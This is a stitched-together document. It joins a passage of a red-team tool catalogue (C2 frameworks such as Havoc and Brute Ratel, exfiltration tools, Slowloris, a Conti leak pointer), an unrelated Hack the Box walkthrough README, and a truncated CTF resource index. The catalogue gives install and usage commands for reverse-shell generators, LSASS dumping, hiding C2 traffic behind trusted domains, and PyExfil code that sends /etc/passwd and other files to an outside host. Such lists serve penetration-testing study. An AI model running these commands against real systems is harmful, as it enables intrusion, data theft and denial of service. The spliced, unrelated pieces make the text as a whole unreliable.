**Usage:** ```bash # Default: interactive - Open interactive menu to run checks separately ./linWinPwn.sh -t <Domain_Controller_IP> [-d <AD_domain> -u <AD_user> -p <AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]> -o <output_dir>] # Auto config - Run NTP sync with target DC and add entry to /etc/hosts before running the modules ./linWinPwn.sh -t <Domain_Controller_IP> --auto-config # LDAPS - Use LDAPS instead of LDAP (port 636) ./linWinPwn.sh -t <Domain_Controller_IP> --ldaps # Module pwd_dump: Password Dump ./linWinPwn.sh -t <Domain_Controller_IP> -M pwd_dump [-d <AD_domain> -u <AD_user> -p <AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]> -o <output_dir>] ``` Full usage information [here](https://github.com/lefayjey/linWinPwn#usage). ![image](https://user-images.githubusercontent.com/100603074/216737032-57ceff01-2606-474d-a745-b39fb4997ea1.png) *Image used from https://github.com/lefayjey/linWinPwn#demos* Command and Control ==================== ### [🔙](#tool-list)[Living Off Trusted Sites Project](https://lots-project.com/) C2 implants can be detected by defenders looking for unusual network traffic to uncommon domains. Additionally proxy solutions can sometimes block connections to untrusted domains. Being able to hide your C2 traffic via a trusted domain will help you to stay undetected and reduce the likelihood of being blocked at the proxy level by security solutions. This resource contains a list of trusted sites that can be used. **Usage:** Visit [https://lots-project.com/](https://lots-project.com/) Search for `+C&C` in the search bar to view all potential domains / subdomains that can be used for command and control operations. Results include: - raw.githubusercontent.com - docs.google.com - *.azurewebsites.net - dropbox.com - *.amazonaws.com ![image](https://user-images.githubusercontent.com/100603074/220959716-85a7f403-95af-441b-9cbf-f6c278be6652.png) *Image used from https://lots-project.com/* ### [🔙](#tool-list)[Havoc](https://github.com/HavocFramework/Havoc) Havoc is a modern and malleable post-exploitation command and control framework, created by [@C5pider](https://twitter.com/C5pider). Features include: Sleep Obfuscation, x64 return address spoofing, Indirect Syscalls for Nt* APIs **Pre-requisites:** (Ubuntu 20.04 / 22.04) ```bash sudo apt install build-essential sudo add-apt-repository ppa:deadsnakes/ppa sudo apt update sudo apt install python3.10 python3.10-dev ``` **Build + Usage:** ```bash git clone https://github.com/HavocFramework/Havoc.git cd Havoc/Client make ./Havoc ``` **Pre-requisites:** (Ubuntu 20.04 / 22.04) ```bash cd Havoc/Teamserver go mod download golang.org/x/sys go mod download github.com/ugorji/go ``` **Build + Usage:** ```bash cd Teamserver ./Install.sh make ./teamserver -h ``` **Run the teamserver** ```bash sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug ``` *Full install, build and run instructions on the [wiki](https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD)* ![image](https://user-images.githubusercontent.com/100603074/206025215-9c7093e5-b45a-4755-81e6-9e2a52a1f455.png) ### [🔙](#tool-list)[Covenant](https://github.com/cobbr/Covenant) Covenant is a .NET command and control framework, it has a web interface that allows for multi-user collaboration. It can be used to remotely control compromised systems and perform a variety of different tasks, including executing arbitrary code, capturing keystrokes, exfiltrating data, and more. **Install: (Dotnet Core)** You can download dotnet core for your platform from [here](https://dotnet.microsoft.com/download/dotnet-core/3.1). **Note:** *After starting Covenant, you must register an initial user through the web interface. Navigating to the web interface will allow you to register the initial user* ```bash git clone --recurse-submodules https://github.com/cobbr/Covenant cd Covenant/Covenant ``` **Usage: (Dotnet Core)** ```bash ~/Covenant/Covenant > dotnet run warn: Microsoft.EntityFrameworkCore.Model.Validation[10400] Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development. WARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated. Covenant has started! Navigate to https://127.0.0.1:7443 in a browser ``` **Install: (Docker)** ```bash # Build the docker image: git clone --recurse-submodules https://github.com/cobbr/Covenant cd Covenant/Covenant ~/Covenant/Covenant > docker build -t covenant . ``` **Usage: (Docker)** ```bash # Run Covenant within the Docker container ~/Covenant/Covenant > docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v </absolute/path/to/Covenant/Covenant/Data>:/app/Data covenant # Stop the container ~/Covenant/Covenant > docker stop covenant # Restart Covenant interactively ~/Covenant/Covenant > docker start covenant -ai ``` Full installation and startup instructions can be found on the wiki [here](https://github.com/cobbr/Covenant/wiki/Installation-And-Startup). ![image](https://user-images.githubusercontent.com/100603074/210168138-58473fc0-4361-41ec-9439-2f2fcb159520.png) *Image from https://github.com/cobbr/Covenant* ### [🔙](#tool-list)[Merlin](https://github.com/Ne0nd0g/merlin) Merlin is an open-source post-exploitation framework that is designed to be used after a initial compromise of a system. It is written in Python and can be used to perform a variety of different tasks, such as executing arbitrary code, moving laterally through a network, and exfiltrating data. **Install:** 1. Download the latest compiled version of Merlin Server from the [releases](https://github.com/Ne0nd0g/merlin/releases) section 2. Extract the files with 7zip using the x function The password is: merlin 3. Start Merlin 4. Configure a [listener](https://merlin-c2.readthedocs.io/en/latest/server/menu/listeners.html) 5. Deploy an agent. See [Agent Execution Quick Start Guide](https://merlin-c2.readthedocs.io/en/latest/quickStart/agent.html) for examples ```bash mkdir /opt/merlin;cd /opt/merlin wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z 7z x merlinServer-Linux-x64.7z sudo ./merlinServer-Linux-x64 ``` **Usage:** 1. Ensure the Merlin server is running with a configured listener 2. Download and deploy an agent to the victim 3. Execute agent For detailed usage information see the official Merlin [wiki](https://merlin-c2.readthedocs.io/en/latest/server/menu/main.html). ![image](https://user-images.githubusercontent.com/100603074/210168329-57c77e4f-213c-4402-8dd8-70ac3bcabcfe.png) *Image from https://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks* ### [🔙](#tool-list)[Metasploit Framework](https://github.com/rapid7/metasploit-framework) Metasploit is an open-source framework for developing, testing, and using exploit code. The Metasploit framework includes a large number of pre-built exploits and payloads, as well as a fully-featured integrated development environment (IDE) for creating and testing custom exploits. **Install: (Installer)** ```bash curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall ``` **Usage:** ```bash /opt/metasploit-framework/bin/msfconsole ``` Full installation instructions can be found on the official [wiki](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html). [Rapid7 Metasploit blogs](https://www.rapid7.com/blog/tag/metasploit/) [Cheat sheet graphic](https://cdn.comparitech.com/wp-content/uploads/2019/06/Metasploit-Cheat-Sheet.webp) [Nice command list](https://github.com/security-cheatsheet/metasploit-cheat-sheet) ![image](https://user-images.githubusercontent.com/100603074/210168463-f1ac1edb-2f0e-4008-a8ba-308f3a741a9e.png) *Image used from https://goacademy.io/how-to-install-metasploit-on-kali-linux/* ### [🔙](#tool-list)[Pupy](https://github.com/n1nj4sec/pupy) Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) C2 and post-exploitation framework written in python and C. It allows an attacker to remotely control a victim's computer and execute various actions, such as command execution, key logging, and taking screen shots. **Install: (Git)** ```bash sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv git clone --recursive https://github.com/n1nj4sec/pupy cd pupy python create-workspace.py -DG pupyw ``` Roll fix to fix the error: ```bash sudo pip2 install rpyc==3.4.4 ``` Start: ```bash export PATH=$PATH:~/.local/bin; pupysh pupyws/bin/pupysh ``` *Git install instructions used from [here](https://kalitut.com/how-to-install-pupy/).* **Install: (Docker)** For detailed docker and pupy installation instructions see the [wiki](https://github.com/n1nj4sec/pupy/wiki/Installation). **Usage:** ```bash # Get help page for any builtin commands with -h >> sessions -h >> jobs -h >> run -h # Interact with session 1 >> sessions -i 1 # Run local command 'ls' >> !ls ``` Full usage information can be found on the [wiki](https://github.com/n1nj4sec/pupy/wiki/Basic-Usage). The wiki contains good [post exploitation information](https://github.com/n1nj4sec/pupy/wiki/Post-Exploitation). ![image](https://user-images.githubusercontent.com/100603074/210181480-d1ad1bd8-fa8d-4014-842c-3efbb35b2644.png) *Image used from https://github.com/n1nj4sec/pupy/wiki/Screenshots* ### [🔙](#tool-list)[Brute Ratel](https://bruteratel.com/) BruteRatel is a great command and control (C4) framework created by [@NinjaParanoid](https://twitter.com/NinjaParanoid). The framework consists of a client component 'badger' that is installed on the compromised system, and a server component 'commander' that is run by the red team. The client and server communicate with each other using various communication channels, such as HTTP, DNS, or TCP, and can be configured to use different encoding and encryption methods to evade detection. Some nice features: - DNS Over HTTPS - Indirect Syscalls - Built-in Debugger To Detect EDR Userland Hooks - MITRE graph integration - Adversary TTP automation **Install:** To legally get access to the framework you will need to buy a licence (1 Year $2500 per user). See the [pricing page](https://bruteratel.com/pricing/) for more information. After purchase you can download the framework from [here](https://bruteratel.com/tabs/download/) with your Activation Key and License User ID. **Usage:** ```bash # Loads a powershell script to memory which can be Invoked using psreflect psimport # Locks keyboard and mouse hardware input. Use ‘unlock_input’ command to unlock lock_input # Dumps user clipboard dumpclip # Enumerates basic domain information dcenum # Elevates user privileges to SYSTEM (Requires admin rights) get_system # Takes a screenshot of current desktop and stores it on the server screenshot # Dumps LSASS to C:\Windows\Memory.DMP using the PssCaptureSnapshot technique shadowclone ``` Full commander terminal usage information can be found [here](https://bruteratel.com/tabs/badger/badgers/). ![image](https://user-images.githubusercontent.com/100603074/210181655-74201cad-a782-43ed-97d3-f4c0926d46c3.png) *Image used from https://bruteratel.com/* ### [🔙](#tool-list)[NimPlant](https://github.com/chvancooten/NimPlant) A light-weight first-stage C2 implant written in Nim. Features: - Lightweight and configurable implant written in the Nim programming language - Encryption and compression of all traffic by default, obfuscates static strings in implant artefacts - Support for several implant types, including native binaries (exe/dll), shellcode or self-deleting executables - Easy deployment of more advanced functionality or payloads via `inline-execute`, `shinject` (using dynamic invocation), or in-thread `execute-assembly` - Comprehensive logging of all interactions and file operations **Install:** ```bash curl https://nim-lang.org/choosenim/init.sh -sSf | sh choosenim stable git clone https://github.com/chvancooten/NimPlant cd client nimble install -d pip3 install -r server/requirements.txt apt install mingw-w64 ``` **Usage:** ```bash # Generate payloads python .\NimPlant.py compile all # Start server python .\NimPlant.py server ``` Before running make sure to create the `config.tool` configuration file, more information can be found [here](https://github.com/chvancooten/NimPlant#getting-started). Full usage information can be found [here](https://github.com/chvancooten/NimPlant#usage). [Blog - Building a C2 Implant in Nim - Considerations and Lessons Learned](https://casvancooten.com/posts/2021/08/building-a-c2-implant-in-nim-considerations-and-lessons-learned/) ![image](https://user-images.githubusercontent.com/100603074/220959859-d930b110-c774-4b4c-b004-e4a85a6214ba.png) *Image used from https://casvancooten.com* ### [🔙](#tool-list)[Hoaxshell](https://github.com/t3l3machus/hoaxshell) A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell. **Install:** ```bash git clone https://github.com/t3l3machus/hoaxshell cd ./hoaxshell sudo pip3 install -r requirements.txt chmod +x hoaxshell.py ``` **Usage:** ```bash # Payload that utilizes Invoke-Expression (default) sudo python3 hoaxshell.py -s <your_ip> # Payload that writes and executes commands from a file sudo python3 hoaxshell.py -s <your_ip> -x "C:\Users\\\$env:USERNAME\.local\hack.ps1" # Encrypted shell session with a trusted certificate sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem> ``` Full usage documentation [here](https://github.com/t3l3machus/hoaxshell#usage). [Usage Demo - YouTube](https://www.youtube.com/watch?v=SEufgD5UxdU) [Hoaxshell vs AV](https://github.com/t3l3machus/hoaxshell#av-bypass-pocs) ![image](https://user-images.githubusercontent.com/100603074/229649767-817d838c-891d-4a33-b494-9249f3a2f404.png) *Image used from https://github.com/t3l3machus/hoaxshell* Exfiltration ==================== ### [🔙](#tool-list)[Dnscat2](https://github.com/iagox86/dnscat2) A tool for establishing C2 connections via DNS, even if the attacker and victim machines are behind a firewall / network address translation (NAT). The tool is designed to be stealthy and difficult to detect, as it uses legitimate DNS traffic to transmit data. **Install: (Compile - Server)** ```bash git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server/ gem install bundler bundle install ``` **Install: (Compile - Client)** ```bash git clone https://github.com/iagox86/dnscat2.git cd dnscat2/client/ make ``` Full installation information can be found in the [Installation Section](https://github.com/iagox86/dnscat2#compiling). **Usage: (Server)** ```bash # Establish the server ruby ./dnscat2.rb DOMAIN.COM ``` **Usage: (Client)** ```bash # Establish the client with authoritative domain ./dnscat2 DOMAIN.COM # Establish the client without authoritative domain ./dnscat2 --dns host=0.0.0.0,port=0000 # Ping the server from the client ./dnscat --ping DOMAIN.COM # Ping the server from the client, with custom dns resolver ip ./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping ``` **Usage: (Tunnels)** ```bash # (After establishing the client) You can open a new tunnelled port listen [lhost:]lport rhost:rport # Forward ssh connections through the dnscat2 client to an internal device listen 127.0.0.1:2222 10.10.10.10:22 ``` Full usage information can be found in the [Usage Section](https://github.com/iagox86/dnscat2#usage). ![image](https://user-images.githubusercontent.com/100603074/210116521-0ef905ec-cc14-4cdc-9831-46bbded8c6af.png) ### [🔙](#tool-list)[Cloakify](https://github.com/TryCatchHCF/Cloakify) When exfiltrating victim files, DLP (Data Loss Prevention) solutions will typically trigger on strings within these files. Cloakify reduces this risk by transforming the data. Cloakify transforms any filetype (e.g. .zip, .exe, .xls, etc.) into a list of harmless-looking strings. This lets you hide the file in plain sight, and transfer the file without triggering alerts. **Note:** You can make your own ciphers, see [here](https://github.com/TryCatchHCF/Cloakify#create-your-own-cipers) for more info. **Install:** ```bash git clone https://github.com/TryCatchHCF/Cloakify ``` **Usage:** ```bash # Cloakify some text python3 cloakify.py TEXT.txt ciphers/desserts.ciph > TEXT.cloaked # De-Cloakify the text python3 decloakify.py TEXT.cloaked ciphers/desserts.ciph ``` ![image](https://user-images.githubusercontent.com/100603074/210117067-4611a42a-2ac7-44af-8aee-2e448c05909b.png) ![image](https://user-images.githubusercontent.com/100603074/210116996-8ec36a12-8eef-44e9-924a-ad179e599910.png) ### [🔙](#tool-list)[PyExfil](https://github.com/ytisf/PyExfil) "An Alpha-Alpha stage package, not yet tested (and will appreciate any feedbacks and commits) designed to show several techniques of data exfiltration is real-world scenarios." **Install:** ```bash git clone https://www.github.com/ytisf/PyExfil;cd PyExfil;pip install -r requirements.txt;pip install py2exe;pip setup.py install ``` **Usage:** (Full Usage [here](https://github.com/ytisf/PyExfil/blob/master/USAGE.md)) #### HTTP Cookies ```python from pyexfil.network.HTTP_Cookies.http_exfiltration import send_file, listen # For Client (exfil) send_file(addr='http://www.morirt.com', file_path=FILE_TO_EXFIL) # For Server (collecting) listen(local_addr='127.0.0.1', local_port=80) ``` #### ICMP Echo 8 ```python from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener # For Client (exfil) ip_addr = "127.0.0.1" send_file(ip_addr, src_ip_addr="127.0.0.1", file_path="", max_packetsize=512, SLEEP=0.1) # For Server (collecting) init_listener(ip_addr, saving_location="/tmp/") ``` #### NTP Request ```python from pyexfil.network.NTP.ntp_exfil import exfiltrate, ntp_listen, NTP_UDP_PORT # For Client (exfil) ip_addr = "127.0.0.1" exfiltrate("/etc/passwd", ip_addr, time_delay=0.1) # For Server (collecting) ntp_listener(ip="0.0.0.0", port=NTP_UDP_PORT) ``` ![image](https://user-images.githubusercontent.com/100603074/206573575-e90384c4-4a39-4f3c-96ec-face1f191808.png) ### [🔙](#tool-list)[Powershell RAT](https://github.com/Viralmaniar/Powershell-RAT) Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment. **Install:** ```bash git clone https://github.com/Viralmaniar/Powershell-RAT ``` **Usage:** (Full Usage [here](https://github.com/Viralmaniar/Powershell-RAT/blob/master/README.md)) #### Setup - Throwaway Gmail address - Enable "Allow less secure apps" by going to https://myaccount.google.com/lesssecureapps - Modify the `$username` & `$password` variables for your account in the Mail.ps1 Powershell file - Modify `$msg.From` & `$msg.To.Add` with throwaway gmail address ![image](https://user-images.githubusercontent.com/100603074/210267906-68a2e852-d7b5-4b61-a747-77844e1d7d99.png) ### [🔙](#tool-list)[GD-Thief](https://github.com/antman1p/GD-Thief) Tool for exfiltrating files from a target's Google Drive that you have access to, via Google's API. This includes all shared files, all files from shared drives, and all files from domain drives that the target has access to. **Install:** ```bash git clone https://github.com/antman1p/GD-Thief.git cd GD-Thief pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib ``` then... 1. Create a new Google Cloud Platform (GCP) project 2. Enable a Google Workspace API 3. Configure OAuth Consent screen 4. Create a credential 5. Add the victim's Google account to the Application's Test Users For detailed setup instructions see the [How To Guide](https://github.com/antman1p/GD-Thief#how-to). **Usage:** ```bash usage: python3 gd_thief.py [-h] -m [{dlAll, dlDict[-d <DICTIONARY FILE PATH>]} [-t <THREAD COUNT>] help: This Module will connect to Google's API using an access token and exfiltrate files from a target's Google Drive. It will output exfiltrated files to the ./loot directory arguments: -m [{dlAll, dlDict}], --mode [{dlAll, dlDict}] The mode of file download Can be "dlAll", "dlDict [-d <DICTIONARY FILE PATH>]", or... (More options to come) optional arguments: -d <DICTIONARY FILE PATH>, --dict <DICTIONARY FILE PATH> Path to the dictionary file. Mandatory with download mode"-m, --mode dlDict" You can use the provided dictionary, per example: "-d ./dictionaries/secrets-keywords.txt" -t <THREAD COUNT>, --threads <THREAD COUNT> Number of threads. (Too many could exceeed Google's rate limit threshold) -h, --help show this help message and exit ``` Nice [blog post](https://antman1p-30185.medium.com/youre-a-gd-thief-1e02358fd557) explaining the logic behind the tool. Impact ==================== ### [🔙](#tool-list)[Conti Pentester Guide Leak](https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak) Conti is a ransomware group that is known for targeting large organizations and using sophisticated tactics to evade detection and maximize the impact of their attacks. Conti has been responsible for a number of high-profile ransomware attacks, including ones against the computer systems of the City of Pensacola, Florida, and the computer systems of the Irish health service. The [Conti Pentester Guide Leak - Repository](https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak) contains leaked pentesting materials given to Conti ransomware group affilates. Topics include: - Configuring Rclone with MEGA for data exfiltration - Configuring AnyDesk as persistence and remote access into a victim’s network - Elevating and gaining admin rights inside a company’s hacked network - Taking over domain controllers - Dumping passwords from Active Directory **Note:** *[vx-underground.org](https://www.vx-underground.org/) obtained more training materials and tools used by Conti ransomware operators [here](https://share.vx-underground.org/Conti/).* ![image](https://user-images.githubusercontent.com/100603074/210856582-44a9bf16-23d4-4b7e-9e91-8604c3191e78.png) *Image used from https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak* ### [🔙](#tool-list)[SlowLoris](https://github.com/gkbrk/slowloris) Slowloris is a type of denial-of-service (DoS) attack that involves sending HTTP requests to a web server in a way that ties up the server's resources, preventing it from being able to process legitimate requests. This attack would typically be conducted with a botnet, it is designed to be difficult to detect and mitigate, as it uses a relatively small number of connections and does not generate a large amount of traffic. **Install: (Pip)** ```bash sudo pip3 install slowloris ``` **Install: (Git)** ```bash git clone https://github.com/gkbrk/slowloris.git cd slowloris ``` **Usage:** ```bash # Pip slowloris example.comr # Git python3 slowloris.py example.com ``` ![image](https://user-images.githubusercontent.com/100603074/210115630-b6541ee0-ad82-471a-9a7e-7f0ec028c67d.png) ### [🔙](#tool-list)[usbkill](https://github.com/hephaest0s/usbkill) This is an anti-forensic kill-switch that waits for a change in USB port status, immediately shutting down endpoint if a change is detected. In some situations, it is imperative that no data is added or removed from an endpoint via USB. This is where USBkill comes in. **Install:** ``` git clone https://github.com/hephaest0s/usbkill cd usbkill ./setup.py install ``` **Usage:** ```bash sudo python3 usbkill.py ``` ![image](https://user-images.githubusercontent.com/100603074/217654429-98efef6d-b70f-48b8-8979-228ce2f78932.png) *Image used from https://en.wikipedia.org/wiki/USBKill* ### [🔙](#tool-list)[Keytap](https://github.com/ggerganov/kbd-audio) This is a tool that can guess the pressed keyboard keys from the audio of a computer's microphone. Keytap2 can also be used to retrieve text from audio snippets of keyboard typing. **Install: (Build)** ``` git clone https://github.com/ggerganov/kbd-audio cd kbd-audio git submodule update --init mkdir build && cd build cmake .. make ``` **Usage:** ```bash # Record audio to a raw binary file on disk ./record-full output.kbd [-cN] # Playback a recording captured via the record-full tool ./play-full input.kbd [-pN] # Record audio only while typing (Useful for collecting training data for keytap) ./record output.kbd [-cN] [-CN] ``` See full usage documentation [here](https://github.com/ggerganov/kbd-audio#tool-details). Try the online demo at [https://keytap.ggerganov.com/](https://keytap.ggerganov.com/). ![image](https://user-images.githubusercontent.com/100603074/229649861-728e7ebb-ddb9-4347-9934-dd077d12bb41.png) *Image used from https://github.com/ggerganov/kbd-audio*
# HTBWalkthroughs Hello and welcome to my walkthroughs for Hack the Box (HTB). I've challenged myself with completing 50 HTB machines over the course of 6 months to learn hacking tools and skills that will prepare me for a career in the field. Being that I am very much a beginner at the time of writing this, I won't be able to solve any machine without guidance at first, so my plan is as follows: 1. The first 10 machines I will do with the help of other write-ups and tutorials (I will attach links to any resources I use at the bottom of each of my walkthroughs). The goal here is to learn the basic tools and skills used in pentesting. 2. The next 15 machines I will attempt to with as little help from other tutorials and write-ups. I will have them open and available but use them only as clues for what I should research to get to the next step. The goal here is to practice problem solving and methodology without direct guidance. 3. The final 25 machines I will attempt to do without tutorials or write-ups, giving me a more realistic feel for how field tests may be. # Table of Contents Intro: * [Set Up](https://github.com/s0merset7/HTBWalkthroughs#set-up) * [Disclaimer](https://github.com/s0merset7/HTBWalkthroughs#disclaimer) Machine Walkthroughs: 1. [Lame Walkthrough](https://github.com/s0merset7/HTBWalkthroughs/blob/master/HTB%20Lame%20Write-Up.md) 2. [Jerry Walkthrough](https://github.com/s0merset7/HTBWalkthroughs/blob/master/HTB%20Jerry%20Write-Up.md) # Set Up I will be using Kali Linux and many of its tools to complete the machines. Unless you want to dual boot or reset the OS of your computer, I would recommend following [these instructions](https://www.nakivo.com/blog/how-to-install-kali-linux-on-virtualbox/) to set it up on your own device. (It's totally free and has plenty of documentation if you come across an issue that isn't in that link) I will also be using many of the tools in Kali Linux to complete the boxes. I will make sure to mention any programs or software that I use in my write-ups. To find any of them in Kali Linux, go to the **Applications** tab on the top left of the window and there will be a dropdown of all of the tools and programs it offers For [Hack the Box](https://www.hackthebox.eu/), you will need to subscribe as a VIP member (its about $13 a month) and with it you will have access to all the retired boxes as well as a bunch of other features I'm still exploring. After signing up, it was a bit confusing for me to set up the VPN to be able to access the challeneges, so [this website](https://steemit.com/ethicalhacking/@rahul516/how-to-connect-to-hack-the-box-vpn) will show you how to set up the VPN to access the challenges (you'll have to figure out how to get an invite code yourself ;) ) # DISCLAIMER As I've said, I am a beginner, and as such there is a very good chance I will explain things wrong or take a longer roundabout way than is neccessary. As I learn more I will do my best to go back and edit any past mistakes. If you catch anything or have a better method, feel free to message me on twitter [@s0merset7](https://twitter.com/s0merset7) ###### <font size="1"> Rm9yIHRoZSBrZXkgdG8gdGhlIG90aGVycywgZmluZCB0aGUgbWVhbmluZyBvZiBteSBuYW1l</font>
Repository to index interesting Capture The Flag tools and other stuff. * [Table of Contents](#table-of-contents) - [Platforms to practice](#platforms-to-practice) - [Cryptography](#cryptography) * [Main](#main) * [Secondary](#secondary) * [Hashes](#hashes) * [Esoteric Languages](#esoteric-languages) - [Steganography](#steganography) - [OSINT](#osint) * [Threat Hunting](#threat-hunting) - [Forensics](#forensics) - [Reversing](#reversing) - [Exploiting](#exploiting) - [Pentesting](#pentesting) * [Recon](#recon) * [Web](#web) * [Exploit Database](#exploit-database) * [Credentials](#credentials) * [Exploitation](#exploitation) * [Active Directory](#active-directory) * [Privilege Escalation](#privilege-escalation) - [Windows](#windows) - [Linux](#linux) * [Legit binaries in a system](#legit-binaries-in-a-system) * [AV bypass](#av-bypass) * [Automatic Frameworks](#automatic-frameworks) * [Mobile](#mobile) * [Wifi](#wifi) * [Utility](#utility) - [Malware](#malware) * [Online engines](#online-engines) * [Distros to analyze malware](#distros-to-analyze-malware) * [Tools](#tools) * [Free AVs and sandboxes](#free-avs-and-sandboxes) * [Ransomware](#ransomware) * [APTs](#apts) * [Blogs and Information](#blogs-and-information) - [Utility](#utility-1) - [Wikis](#wikis) - [Write-Ups](#write-ups) - [Other tools](#other-tools) ## Platforms to practice https://ctftime.org/ https://www.hackthebox.eu/ https://atenea.ccn-cert.cni.es/home https://tryhackme.com/ https://www.vulnhub.com/ * Web Hacking challenges: http://webhacking.kr/ * Platform for learning modern cryptography: https://cryptohack.org/ * Reversing platform: https://crackmes.one/ * Forensics Challenges: https://ctf.unizar.es/ && https://freetraining.dfirdiva.com/dfir-ctfs-challenges && https://socvel.com/ * PicoCTF: https://play.picoctf.org/login * Blue team: https://letsdefend.io/ ## Cryptography ### Main https://gchq.github.io/CyberChef/ https://www.dcode.fr/tools-list#cryptography * Cipher Identifier and Analyzer: https://www.boxentriq.com/code-breaking/cipher-identifier * Data format identifier: https://geocaching.dennistreysa.de/multisolver/ ### Secondary * Automated cryptogram solver (substitution) https://quipqiup.com/ * Frequency Analysis: https://crypto.interactive-maths.com/frequency-analysis-breaking-the-code.html * Brute force Vigenere: https://guballa.de/vigenere-solver * RsaCtfTool: https://github.com/Ganapati/RsaCtfTool * Decrpyt emoji messages https://cryptoji.com/ & https://cryptii.com/pipes/morse-code-with-emojis * Padding-oracle-attacker: https://github.com/KishanBagaria/padding-oracle-attacker * Maritime signal flags dictionary: https://en.wikipedia.org/wiki/International_maritime_signal_flags * Enigma: https://cryptii.com/ * Factoring: http://factordb.com/ * Cryptanalysis recopilation: https://github.com/mindcrypt/Cryptanalysis http://rumkin.com/tools/cipher/ * Real time converter: https://kt.gy/tools.html#conv/ * Simple script to calculate the onion address from a Tor hidden service descriptor or public key: https://gist.github.com/DonnchaC/d6428881f451097f329e (you need to modify the line 14 for working properly "onion_address = hashlib.sha1(key.exportKey('DER')[22:]).digest()[:10]"). * Speech to text: https://speech-to-text-demo.ng.bluemix.net/ * Lyrics song: https://codewithrockstar.com/online * Online generator md5 hash of a string: http://www.md5.cz/ ### Hashes * Hash DB: https://crackstation.net/ * Dehashed: https://www.dehashed.com/ * Cracking Hashes: http://rainbowtables.it64.com/ * Hash DB: https://www.onlinehashcrack.com/ * Hash DB: https://md5decrypt.net/en/ * Hash DB: https://hashkiller.io/ * Hash DB: https://hashes.com/en/decrypt/hash ### Esoteric Languages * Ook! esoteric programming language decoder: https://www.dcode.fr/ook-language * Brainfuck esoteric programming language decoder: https://www.dcode.fr/brainfuck-language * Malboge esoteric programming language decoder: https://www.malbolge.doleczek.pl/ * COW esoteric programming language: https://frank-buss.de/cow.html ## Steganography * Exiftool * Zsteg * Exiv2 * Identify -verbose file * Magic Numbers Signatures: https://asecuritysite.com/forensics/magic && https://www.garykessler.net/library/file_sigs.html → Hexeditor * Shellcode detection: "8B EC" * Binwalk -e image * Foremost -i image -o outdir * Steghide: http://steghide.sourceforge.net/documentation/manpage_es.php (e.g: steghide extract -sf file , steghide info file) * Stegseek: https://github.com/RickdeJager/stegseek (Better than Stegcracker) * StegCracker: https://github.com/Paradoxis/StegCracker * Deeper steganography analysis tool: https://aperisolve.fr/ * Spectrum Analyzer: https://academo.org/demos/spectrum-analyzer/ * Stegsolve: https://github.com/zardus/ctf-tools/blob/master/stegsolve/install (running: java -jar steg_solve.jar) * Fourier Transform: http://bigwww.epfl.ch/demo/ip/demos/FFT/ && https://github.com/0xcomposure/FFTStegPic * Digital invisible ink stego tool: https://sourceforge.net/projects/diit/ * Decoding files from 8-bit Atari turbo cassette tapes: https://github.com/baktragh/turbodecoder https://incoherency.co.uk/image-steganography/#unhide http://exif-viewer.com/ https://stegonline.georgeom.net/upload https://stylesuxx.github.io/steganography/ https://skynettools.com/free-online-steganography-tools/ * Morse Code Adaptive Audio Decoder: https://morsecode.world/international/decoder/audio-decoder-adaptive.html * Audacity (sudo apt-get install audacity) E.g: https://www.hackiit.cf/write-up-hackiit-ctf-biological-hazard-ii/ * AudioStego: https://github.com/danielcardeenas/AudioStego * Analyze suspicious files and urls to detect stegomalware: https://stegoinspector.com/#/ * Aurebesh Translator: https://funtranslations.com/aurebesh * Bitcoin Steganography: https://incoherency.co.uk/stegoseed/ * Mojibake Steganography: https://incoherency.co.uk/mojibake/ * Chess Steganography : https://incoherency.co.uk/chess-steg/ * Magic Eye Solver / Viewer: https://magiceye.ecksdee.co.uk/ * QR decoder: https://online-barcode-reader.inliteresearch.com/ && https://zxing.org/w/decode.jspx * Stegosuite: http://manpages.ubuntu.com/manpages/bionic/man1/stegosuite.1.html * StegSpy: http://www.spy-hunter.com/stegspydownload.htm * StegSecret: http://stegsecret.sourceforge.net/ * Openstego: https://www.openstego.com/ * Stegpic: https://domnit.org/stepic/doc/ * Bytehist: https://www.cert.at/en/downloads/software/software-bytehist https://www.bertnase.de/npiet/npiet-execute.php * Repair images: https://online.officerecovery.com/es/pixrecovery/ * Tool for recovering passwords from pixelized screenshots: https://github.com/beurtschipper/Depix * Forensic Image Analysis: https://github.com/GuidoBartoli/sherloq * Unicode Steganography with Zero-Width Characters: https://330k.github.io/misc_tools/unicode_steganography.html * Stegsnow(Zero-Width Characters): https://pentesttools.net/hide-secret-messages-in-text-using-stegsnow-zero-width-characters/ * SPAM language or PGP: https://www.spammimic.com/decode.shtml * f5stegojs: https://desudesutalk.github.io/f5stegojs/ * Unshorten links: https://unshorten.it/ * PNG dump: https://blog.didierstevens.com/2022/04/18/new-tool-pngdump-py-beta/ ## OSINT * Ip information: https://www.maxmind.com/en/geoip-demo https://sitereport.netcraft.com/? && https://searchdns.netcraft.com/ * https://iocfeed.mrlooquer.com/ * https://www.ipaddress.com/ * GHDB (Google Hacking Database): https://www.exploit-db.com/google-hacking-database * Google CheatSheet: 